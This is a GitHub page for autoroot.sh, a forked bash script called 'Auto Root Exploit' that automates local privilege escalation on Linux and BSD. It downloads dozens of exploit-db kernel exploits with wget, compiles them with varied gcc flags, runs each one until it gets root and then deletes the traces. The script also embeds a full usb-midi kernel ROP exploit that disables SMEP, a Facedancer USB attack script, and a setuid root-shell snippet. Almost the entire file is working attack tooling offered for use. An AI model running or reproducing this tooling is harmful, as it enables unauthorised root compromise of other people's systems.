forked from nilotpalbiswas/Auto-Root-Exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
/
autoroot.sh
1066 lines (1056 loc) · 35.3 KB
/
autoroot.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/bin/bash
#All exploits are suggested by "exploitdb" and will update according to it.
#Name : Auto Root
#Author : Nilotpal Biswas
#Facebook : https://www.facebook.com/nilotpal.biswas.73
#Twitter : https://twitter.com/nilotpalhacker
#USAGE : bash autoroot.sh
ver=4.2
clear
echo "==================================================="
echo " Auto Root Exploit v$ver"
echo " by Nilotpal Biswas"
echo "==================================================="
checkroot() {
if [ $(id -u) == 0 ]; then
echo
echo "Successfully R00T(ed).. have fun :)"
echo "ID => " $(id)
echo "WHOAMI => " $(whoami)
echo
exit
fi
}
ccmpl() {
arraycmpl=(
"exploit.c -lutil -lpthread"
"exploit.c -m32 -O2 -o exploit"
"exploit.c -o exploit"
"exploit.c -o exploit -lkeyutils -Wall"
"exploit.c -o exploit -lpthread"
"exploit.c -o exploit -pthread"
"exploit.c -o exploit -static -Wall"
"exploit.c -o exploit -Wall"
"-fPIC -shared -o exploit exploit.c -ldl -w"
"-O2 exploit.c -o exploit"
"-O2 -fomit-frame-pointer exploit.c -o exploit"
"-o exploit exploit.c -static -O2"
"-pthread exploit.c -o exploit -lcrypt"
"-Wall -m64 -o exploit exploit.c"
"-Wall -o exploit exploit.c"
)
for i in "${arraycmpl[@]}"
do
gcc $i >> /dev/null
./exploit
./a.out
checkroot
rm -rf exploit
rm -rf a.out
cc $i >> /dev/null
./exploit
./a.out
checkroot
rm -rf exploit
rm -rf a.out
sleep 1
done
rm -rf exploit.c
}
shcmpl(){
bash exploit.sh
checkroot;
rm -rf exploit.sh
rm -rf *.c
rm -rf *.out
}
pycmpl(){
python exploit.py
checkroot;
rm -rf exploit.py
rm -rf *.c
rm -rf *.out
}
function 2x {
checkroot
echo
echo "R00Ting.. wait"
echo "2.6"
#c
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2031.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/17391.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/18411.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/33321.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/35161.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/5092.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/8572.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86/local/9542.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/25202.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/33322.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/40812.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2013.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/5093.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/8673.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/9083.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/10613.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2004.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/15024.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/15704.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/25444.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/30604.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2005.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/15285.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2006.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/40616.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/1397.c -O exploit.c
ccmpl
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/8678.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/40839.c -O exploit.c
ccmpl
#sh
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/2011.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/8478.sh -O exploit.sh
shcmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/10018.sh -O exploit.sh
shcmpl
#py
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/12130.py -O exploit.py
pycmpl
#txt
#platforms/linux/local/9191.txt
wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz
tar -zxf 9191.tgz
cd cheddar_bay
bash cheddar_bay.sh
cc -fno-stack-protector -o exploit exploit.c
./exploit
cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
./exploit
cd ..
rm -rf cheddar_bay
rm -rf 9191.tgz
tar -zxf 33395.tgz
cd ext4_own
bash ext4_own.sh
cd ..
rm -rf ext4_own
rm -rf 33395.tgz
checkroot;
#platforms/linux/local/23674.txt
smbmount --version
ls -l /usr/bin/smbmount
ls -l /usr/bin/smbmnt
cat > a.c << __EOF__
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
__EOF__
make a
cc a.c -o a
chmod +s a
share:/etc/samba/smb.conf
/etc/samba/smb.conf
[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share
ls -l a
ls -l pokus/a
id
checkroot;
rm -rf a.c
rm -rf a
#platforms/linux/local/29714.txt
wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29714.tgz
tar -zxf 29714.tgz
cd exploit
make
make install
cd ..
rm -rf exploit
rm -rf 29714.tgz
checkroot;
#platforms/linux/local/33395.txt
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33395.tgz
tar -zxf 33395.tgz
cd ext4_own
bash ext4_own.sh
checkroot;
cd ..
rm -rf ext4_own
rm -rf 33395.tgz
#platforms/linux/local/41770.txt
(./ProcReadHelper /proc/$$/syscall) & sleep 1 exec /usr/bin/passwd
checkroot;
echo "Current pid is $$"
(sleep 10; echo 127 ) > /proc/$$/coredump_filter & sleep 5 exec /usr/bin/passwd
checkroot;
(sleep 3; echo 15) > /proc/$$/oom_adj & exec /usr/bin/passwd
checkroot;
#pl
echo
echo "Srry.. I tried hard, but no luck this time.. Wait for update :("
}
function 3x {
checkroot
echo
echo "R00Ting.. wait"
echo "3.x"
#c
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/37292.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/33824.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/24555.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/41995.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/24746.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/33336.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/33516.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/27297.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/31347.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/42887.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/33589.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/35370.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/38390.c -O exploit.c
ccmpl
#sh
#py
#txt
#platforms/linux/local/37293.txt
./create-namespace
ls -al upper/copy_of_shadow
stat upper/copy_of_shadow /etc/shadow|grep Inode
./create-namespace
ls -al /etc/copy_of_shadow
ls -al /root
mkdir o upper work
mount -t overlayfs -o
ls -al o 2>/dev/null
checkroot;
#platforms/linux/local/38559.txt
rmmod b43
modprobe b43 fwpostfix=AA%xBB
dmesg
checkroot;
#platforms/linux/local/41999.txt
cat > poc.c << __EOF__
// A part of the proof-of-concept exploit for the vulnerability in the usb-midi
// driver. Meant to be used in conjuction with a hardware usb emulator, which
// emulates a particular malicious usb device (a Facedancer21 for example).
//
// Andrey Konovalov <[email protected]>
//
// Usage:
// // Edit source to set addresses of the kernel symbols and the ROP gadgets.
// $ gcc poc.c -masm=intel
// // Run N instances of the binary with the argument increasing from 0 to N,
// // where N is the number of cpus on your machine.
// $ ./a.out 0 & ./a.out 1 & ...
// [+] starting as: uid=1000, euid=1000
// [+] payload addr: 0x400b60
// [+] fake stack mmaped
// [+] plug in the usb device...
// // Now plug in the device a few times.
// // In one of the instances you will get (if the kernel doesn't crash):
// [+] got r00t: uid=0, euid=0
// # id
// uid=0(root) gid=0(root) groups=0(root)
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
// You need to set these based on your kernel.
// To easiest way to obtain the addresses of commit_creds and prepare_kernel_cred
// is to boot your kernel and grep /proc/kallsyms for them.
// The easiest way to obtain the gadgets addresses is to use the ROPgadget util.
// Note that all of the used gadgets must preserve the initial value of the rbp
// register, since this value is used later on to restore rsp.
// The value of CR4_DESIRED_VALUE must have the SMEP bit disabled.
#define COMMIT_CREDS 0xffffffff810957e0L
#define PREPARE_KERNEL_CRED 0xffffffff81095ae0L
#define XCHG_EAX_ESP_RET 0xffffffff8100008aL
#define POP_RDI_RET 0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L
#define MOV_CR4_RDI_RET 0xffffffff8105b8f0L
#define POP_RCX_RET 0xffffffff810053bcL
#define JMP_RCX 0xffffffff81040a90L
#define CR4_DESIRED_VALUE 0x407f0
// Payload. Saves eax, which holds the 32 lower bits of the old esp value,
// disables SMEP, restores rsp, obtains root, jumps back to the caller.
#define CHAIN_SAVE_EAX \
*stack++ = POP_RDI_RET; \
*stack++ = (uint64_t)&saved_eax; \
*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
#define CHAIN_SET_CR4 \
*stack++ = POP_RDI_RET; \
*stack++ = CR4_DESIRED_VALUE; \
*stack++ = MOV_CR4_RDI_RET; \
#define CHAIN_JMP_PAYLOAD \
*stack++ = POP_RCX_RET; \
*stack++ = (uint64_t)&payload; \
*stack++ = JMP_RCX; \
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root(void) {
commit_creds(prepare_kernel_cred(0));
}
uint64_t saved_eax;
// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
asm volatile (" \n\
payload: \n\
movq %%rbp, %%rax \n\
movq $0xffffffff00000000, %%rdx \n\
andq %%rdx, %%rax \n\
movq %0, %%rdx \n\
addq %%rdx, %%rax \n\
movq %%rax, %%rsp \n\
jmp get_root \n\
" : : "m"(saved_eax) : );
}
void payload();
// Kernel structs.
struct ubuf_info {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};
struct skb_shared_info {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};
#define MIDI_MAX_ENDPOINTS 2
struct snd_usb_midi {
uint8_t bullshit[240];
struct snd_usb_midi_endpoint {
uint64_t out; // struct snd_usb_midi_out_endpoint *
uint64_t in; // struct snd_usb_midi_in_endpoint *
} endpoints[MIDI_MAX_ENDPOINTS];
// More bullshit.
};
// Init buffer for overwriting a skbuff object.
struct ubuf_info ui;
void init_buffer(char* buffer) {
struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[192];
struct snd_usb_midi *midi = (struct snd_usb_midi *)&buffer[0];
int i;
ssi->tx_flags = 0xff;
ssi->destructor_arg = (uint64_t)&ui;
ui.callback = XCHG_EAX_ESP_RET;
// Prevents some crashes.
ssi->nr_frags = 0;
// Prevents some crashes.
ssi->frag_list = 0;
// Prevents some crashes.
for (i = 0; i < MIDI_MAX_ENDPOINTS; i++) {
midi->endpoints[i].out = 0;
midi->endpoints[i].in = 0;
}
}
// Map a fake stack where the ROP payload resides.
void mmap_stack() {
uint64_t stack_addr;
int stack_offset;
uint64_t* stack;
int page_size;
page_size = getpagesize();
stack_addr = (XCHG_EAX_ESP_RET & 0x00000000ffffffffL) & ~(page_size - 1);
stack_offset = XCHG_EAX_ESP_RET % page_size;
stack = mmap((void *)stack_addr, page_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (stack == MAP_FAILED) {
perror("[-] mmap()");
exit(EXIT_FAILURE);
}
stack = (uint64_t *)((char *)stack + stack_offset);
CHAIN_SAVE_EAX;
CHAIN_SET_CR4;
CHAIN_JMP_PAYLOAD;
}
// Sending control messages.
int socket_open(int port) {
int sock;
struct sockaddr_in sa;
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("[-] connect()");
exit(EXIT_FAILURE);
}
return sock;
}
void socket_close(int sock) {
close(sock);
}
void socket_sendmmsg(int sock) {
struct mmsghdr msg[1];
struct iovec msg2;
int rv;
char buffer[512];
memset(&msg2, 0, sizeof(msg2));
msg2.iov_base = &buffer[0];
msg2.iov_len = 512;
memset(msg, 0, sizeof(msg));
msg[0].msg_hdr.msg_iov = &msg2;
msg[0].msg_hdr.msg_iovlen = 1;
memset(&buffer[0], 0xa1, 512);
struct cmsghdr *hdr = (struct cmsghdr *)&buffer[0];
hdr->cmsg_len = 512;
hdr->cmsg_level = SOL_IP + 1;
init_buffer(&buffer[0]);
msg[0].msg_hdr.msg_control = &buffer[0];
msg[0].msg_hdr.msg_controllen = 512;
rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
if (rv == -1) {
perror("[-] sendmmsg()");
exit(EXIT_FAILURE);
}
}
// Allocating and freeing skbuffs.
struct sockaddr_in server_si_self;
struct sockaddr_in client_si_other;
int init_server(int port) {
int sock;
int rv;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
memset(&server_si_self, 0, sizeof(server_si_self));
server_si_self.sin_family = AF_INET;
server_si_self.sin_port = htons(port);
server_si_self.sin_addr.s_addr = htonl(INADDR_ANY);
rv = bind(sock, (struct sockaddr *)&server_si_self,
sizeof(server_si_self));
if (rv == -1) {
perror("[-] bind()");
exit(EXIT_FAILURE);
}
return sock;
}
int init_client(int port) {
int sock;
int rv;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == -1) {
perror("[-] socket()");
exit(EXIT_FAILURE);
}
memset(&client_si_other, 0, sizeof(client_si_other));
client_si_other.sin_family = AF_INET;
client_si_other.sin_port = htons(port);
rv = inet_aton("127.0.0.1", &client_si_other.sin_addr);
if (rv == 0) {
perror("[-] inet_aton()");
exit(EXIT_FAILURE);
}
return sock;
}
void client_send_message(int sock) {
int rv;
// Messages of 128 bytes result in 512 bytes skbuffs.
char sent_message[128] = { 0x10 };
rv = sendto(sock, &sent_message[0], 128, 0,
(struct sockaddr *)&client_si_other,
sizeof(client_si_other));
if (rv == -1) {
perror("[-] sendto()");
exit(EXIT_FAILURE);
}
}
void destroy_server(int sock) {
close(sock);
}
void destroy_client(int sock) {
close(sock);
}
// Checking root.
void exec_shell() {
char *args[] = {"/bin/sh", "-i", NULL};
execve("/bin/sh", args, NULL);
}
void fork_shell() {
pid_t rv;
rv = fork();
if (rv == -1) {
perror("[-] fork()");
exit(EXIT_FAILURE);
}
if (rv == 0) {
exec_shell();
}
while (true) {
sleep(1);
}
}
bool is_root() {
return getuid() == 0;
}
void check_root() {
if (!is_root())
return;
printf("[+] got r00t: uid=%d, euid=%d\n", getuid(), geteuid());
// Fork and exec instead of just doing the exec to avoid freeing skbuffs
// and prevent some crashes due to a allocator corruption.
fork_shell();
}
// Main.
#define PORT_BASE_1 4100
#define PORT_BASE_2 4200
#define PORT_BASE_3 4300
#define SKBUFFS_NUM 64
#define MMSGS_NUM 256
int server_sock;
int client_sock;
void step_begin(int id) {
int i;
server_sock = init_server(PORT_BASE_2 + id);
client_sock = init_client(PORT_BASE_2 + id);
for (i = 0; i < SKBUFFS_NUM; i++) {
client_send_message(client_sock);
}
for (i = 0; i < MMSGS_NUM; i++) {
int sock = socket_open(PORT_BASE_3 + id);
socket_sendmmsg(sock);
socket_close(sock);
}
}
void step_end(int id) {
destroy_server(server_sock);
destroy_client(client_sock);
}
void body(int id) {
int server_sock, client_sock, i;
server_sock = init_server(PORT_BASE_1 + id);
client_sock = init_client(PORT_BASE_1 + id);
for (i = 0; i < 512; i++)
client_send_message(client_sock);
while (true) {
step_begin(id);
check_root();
step_end(id);
}
}
bool parse_int(const char *input, int *output) {
char* wrong_token = NULL;
int result = strtol(input, &wrong_token, 10);
if (*wrong_token != '\0') {
return false;
}
*output = result;
return true;
}
int main(int argc, char **argv) {
bool rv;
int id;
if (argc != 2) {
printf("Usage: %s <instance_id>\n", argv[0]);
return EXIT_SUCCESS;
}
rv = parse_int(argv[1], &id);
if (!rv) {
printf("Usage: %s <instance_id>\n", argv[0]);
return EXIT_SUCCESS;
}
printf("[+] starting as: uid=%d, euid=%d\n", getuid(), geteuid());
printf("[+] payload addr: %p\n", &payload);
mmap_stack();
printf("[+] fake stack mmaped\n");
printf("[+] plug in the usb device...\n");
body(id);
return EXIT_SUCCESS;
}
__EOF__
gcc poc.c -masm=intel
./a.out 0
checkroot;
./a.out 1
checkroot;
./a.out 2
checkroot;
./a.out 3
checkroot;
./a.out 4
checkroot;
./a.out 5
checkroot;
./a.out 6
checkroot;
./a.out 7
checkroot;
./a.out 8
checkroot;
./a.out 9
checkroot;
./a.out 10
checkroot;
rm a.out
rm poc.c
cat > poc.py << __EOF__
#!/usr/bin/env python3
# A part of the proof-of-concept exploit for the vulnerability in the usb-midi
# driver. Can be used on it's own for a denial of service attack. Should be
# used in conjuction with a userspace part for an arbitrary code execution
# attack.
#
# Requires a Facedancer21 board
# (http://goodfet.sourceforge.net/hardware/facedancer21/).
#
# Andrey Konovalov <[email protected]>
from USB import *
from USBDevice import *
from USBConfiguration import *
from USBInterface import *
class PwnUSBDevice(USBDevice):
name = "USB device"
def __init__(self, maxusb_app, verbose=0):
interface = USBInterface(
0, # interface number
0, # alternate setting
255, # interface class
0, # subclass
0, # protocol
0, # string index
verbose,
[],
{}
)
config = USBConfiguration(
1, # index
"Emulated Device", # string desc
[ interface ] # interfaces
)
USBDevice.__init__(
self,
maxusb_app,
0, # device class
0, # device subclass
0, # protocol release number
64, # max packet size for endpoint 0
0x0763, # vendor id
0x1002, # product id
0, # device revision
"Midiman", # manufacturer string
"MidiSport 2x2", # product string
"?", # serial number string
[ config ],
verbose=verbose
)
from Facedancer import *
from MAXUSBApp import *
sp = GoodFETSerialPort()
fd = Facedancer(sp, verbose=1)
u = MAXUSBApp(fd, verbose=1)
d = PwnUSBDevice(u, verbose=4)
d.connect()
try:
d.run()
except KeyboardInterrupt:
d.disconnect()
__EOF__
python poc.py
checkroot;
rm poc.py
rm a.out
rm exploit
checkroot;
#pl
echo
echo "Srry.. I tried hard, but no luck this time.. Wait for update :("
}
function 4x {
checkroot
echo
echo "R00Ting.. wait"
echo "4.x"
#c
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/40871.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/40003.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/44303.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/41994.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/39166.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/41886.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/39277.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/43127.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/41458.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux_x86-64/local/40049.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/43029.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/linux/local/39230.c -O exploit.c
ccmpl
#sh
#py
#txt
#platforms/linux/local/39772.txt
wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
cd 39772
unzip 39772.zip
tar -xf exploit.tar
cd ebpf_mapfd_doubleput_exploit
bash compile.sh
./hello
./doubleput
./suidhelper
cd ..
rm -rf ebpf_mapfd_doubleput_exploit
rm -rf exploit.tar
checkroot;
tar -xf crasher.tar
cd ebpf_mapfd_doubleput_crasher
bash compile.sh
./doubleput
cd ..
rm -rf ebpf_mapfd_doubleput_crasher
rm -rf 39772
rm -rf 39772.zip
checkroot;
#platforms/linux/local/40489.txt
wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip
unzip 40489.zip
cd 40489
bash compile.sh
./pwn
./enjoy
cd ..
rm -rf 40489
rm -rf 40489.zip
checkroot;
#pl
echo
echo "Srry.. I tried hard, but no luck this time.. Wait for update :("
}
function bsdx {
checkroot
echo
echo "R00Ting.. wait"
echo "bsd"
#c
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/7581.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/bsd/local/16951.c -O exploit.c
ccmpl
wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits/freebsd/local/8261.c -O exploit.c
ccmpl
